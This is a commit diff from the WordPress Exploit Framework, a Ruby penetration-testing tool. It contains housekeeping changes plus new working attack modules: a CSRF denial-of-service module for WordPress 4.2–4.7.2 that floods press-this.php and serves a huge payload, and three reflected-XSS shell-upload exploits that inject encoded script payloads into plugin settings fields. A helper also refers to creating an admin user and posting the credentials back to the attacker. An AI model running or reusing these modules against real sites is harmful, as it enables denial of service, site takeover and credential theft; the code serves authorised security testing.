Merge branch 'development'

Author: rastating

VERSION

@@ -1 +1 @@
-1.5
+1.5.1

env.rb

@@ -1,10 +1,31 @@
-require 'colorize'
 require 'date'
+require 'fileutils'
 require 'json'
-require 'require_all'
 require 'time'
-require 'typhoeus'
-require 'zip'
+
+required_gems = [
+  'colorize',
+  'mime/types',
+  'nokogiri',
+  'require_all',
+  'slop',
+  'typhoeus',
+  'zip'
+]
+
+required_gems.each do |gem_name|
+  begin
+    require gem_name
+  rescue LoadError
+    puts
+    puts "Failed to load required dependency: #{gem_name}"
+    puts
+    puts 'You must run "bundle install" prior to using WordPress Exploit Framework.'
+    puts 'If bundler is not present on your system, you can install it by running "gem install bundler"'
+    puts
+    exit
+  end
+end
 
 wpxfbase = __FILE__
 

lib/cli/console.rb

@@ -65,7 +65,12 @@ def prompt_for_input
       prompt += " [#{context.module_path}]" if context
       prompt += ' > '
 
-      input = Readline.readline(prompt, true).to_s
+      begin
+        input = Readline.readline(prompt, true).to_s
+      rescue SignalException
+        input = ''
+      end
+
       puts if input.empty?
       input
     end

lib/cli/module_info.rb

@@ -16,7 +16,7 @@ def print_description
         if context.module.module_description_preformatted
           print_std(indent_without_wrap(context.module.module_desc))
         else
-          print_std(wrap_text(context.module.module_desc))
+          print_std(wrap_text(context.module.module_desc).strip)
         end
       end
     end

lib/cli/output.rb

@@ -8,7 +8,8 @@ def indent_cursor(level = 1)
     end
 
     def wrap_text(s, padding = 0, width = 78)
-      s.gsub(/(.{1,#{width}})(\s+|\Z)/, "\\1\n#{@indent * @indent_level}#{' ' * padding}").chomp
+      s.tr("\n", '')
+       .gsub(/(.{1,#{width}})(\s+|\Z)/, "\\1\n#{@indent * @indent_level}#{' ' * padding}").chomp
        .gsub(/\s+$/, '')
     end
 

lib/wpxf/wordpress/xss.rb

@@ -65,6 +65,11 @@ def xss_ascii_encoded_include_script
     "eval(String.fromCharCode(#{xss_include_script.bytes.join(',')}))"
   end
 
+  # @return [String] the URL encoded value of #xss_ascii_encoded_include_script.
+  def xss_url_and_ascii_encoded_include_script
+    url_encode(xss_ascii_encoded_include_script)
+  end
+
   # @return [String] a script that will create a new admin user and post the
   #   credentials back to {#xss_url}.
   def wordpress_js_create_user

modules/auxiliary/wp_v4.7.2_csrf_dos.rb

@@ -0,0 +1,81 @@
+class Wpxf::Auxiliary::Wp472CsrfDos < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'WordPress 4.2-4.7.2 - CSRF DoS',
+      desc: %(
+        A Cross-Site Request Forgery (CSRF) vulnerability exists on the Press This page of WordPress.
+        This issue can be used to create a Denial of Service (DoS) condition if an authenticated
+        administrator visits a malicious URL.
+      ),
+      author: [
+        'Sipke Mellema',                  # Vulnerability disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8770'],
+        ['URL', 'https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/'],
+        ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html']
+      ],
+      date: 'Mar 06 2017'
+    )
+
+    register_option(
+      IntegerOption.new(
+        name: 'request_count',
+        required: true,
+        desc: 'The number of requests to make',
+        default: 50
+      )
+    )
+  end
+
+  def check
+    target_version = wordpress_version
+    return :unknown if target_version.nil?
+
+    version_vulnerable?(target_version, Gem::Version.new('4.7.3'), Gem::Version.new('4.2'))
+  end
+
+  def url_with_xss
+    xss_url
+  end
+
+  def request_count
+    normalized_option_value('request_count')
+  end
+
+  def generate_payload_url
+    normalize_uri(wordpress_url_admin, "press-this.php?u=#{url_encode(xss_url)}#{url_encode('.txt')}&url-scan-submit=Scan&#{Utility::Text.rand_alpha(3)}=#{Utility::Text.rand_alpha(3)}")
+  end
+
+  def on_http_request(path, _params, _headers)
+    if path == "/#{xss_path}"
+      emit_info 'Starting DoS...'
+      res = ''
+      request_count.times do
+        res = "#{res}<img src='#{generate_payload_url}'>"
+      end
+
+      { body: res, type: 'text/html' }
+    else
+      emit_info 'Sending DoS payload...'
+      '<>' * 56_000_000
+    end
+  end
+
+  def run
+    return false unless super
+
+    emit_info 'Provide the URL below to the victim to begin the denial of service'
+    puts
+    puts url_with_xss
+    puts
+
+    start_http_server
+    true
+  end
+end

modules/exploits/admin_custom_login_reflected_xss_shell_upload.rb

@@ -0,0 +1,40 @@
+class Wpxf::Exploit::AdminCustomLoginReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Admin Custom Login <= 2.4.7.1 Reflected XSS Shell Upload',
+      author: [
+        'Burak Kelebek',                  # Disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8759'],
+        ['URL', 'https://sumofpwn.nl/advisory/2016/admin_custom_login_wordpress_plugin_affected_by_persistent_cross_site_scripting_via_logo_url_field.html']
+      ],
+      date: 'Mar 01 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('admin-custom-login', '2.4.7.2')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'options-general.php?page=admin_custom_login')
+  end
+
+  def initial_script
+    create_basic_post_script(
+      vulnerable_url,
+      'Action'         => 'logoSave',
+      'logo_image'     => normalize_uri(wordpress_url_uploads, "#{Utility::Text.rand_alpha(5)}.jpg"),
+      'logo_width'     => Utility::Text.rand_numeric(2),
+      'logo_height'    => Utility::Text.rand_numeric(2),
+      'logo_url'       => "\\\"><script>#{xss_ascii_encoded_include_script}<\\/script>",
+      'logo_url_title' => Utility::Text.rand_alpha(10)
+    )
+  end
+end

modules/exploits/alpine_photo_tile_for_instagram_reflected_xss_shell_upload.rb

@@ -0,0 +1,38 @@
+class Wpxf::Exploit::AlpinePhotoTileForInstagramReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Alpine PhotoTile for Instagram <= 1.2.7.7 Reflected XSS Shell Upload',
+      author: [
+        'Antonis Manaras',                # Disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8754'],
+        ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_alpine_phototile_for_instagram_wordpress_plugin.html']
+      ],
+      date: 'Mar 02 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('alpine-photo-tile-for-instagram', '1.2.7.8')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'options-general.php?page=alpine-photo-tile-for-instagram-settings&tab=add')
+  end
+
+  def initial_script
+    create_basic_post_script(
+      vulnerable_url,
+      'hidden' => 'Y',
+      'add-user' => 'Y',
+      'client_id' => "<\\/script><img src=x onerror=#{xss_ascii_encoded_include_script}>",
+      'client_secret' => Utility::Text.rand_alphanumeric(10)
+    )
+  end
+end

modules/exploits/anyvar_reflected_xss_shell_upload.rb

@@ -0,0 +1,38 @@
+class Wpxf::Exploit::AnyvarReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'AnyVar <= 0.1.1 Reflected XSS Shell Upload',
+      author: [
+        'Larry W. Cashdollar',            # Disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8764'],
+        ['CVE', '2017-6103'],
+        ['URL', 'http://www.vapidlabs.com/advisory.php?v=177']
+      ],
+      date: 'Feb 21 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('anyvar', '0.1.2')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'tools.php?page=anyvar/anyvar.php')
+  end
+
+  def initial_script
+    create_basic_post_script(
+      vulnerable_url,
+      'action' => 'add',
+      'var_name' => Utility::Text.rand_alphanumeric(10),
+      'var_text' => "</textarea><script>#{xss_ascii_encoded_include_script}<\\/script>"
+    )
+  end
+end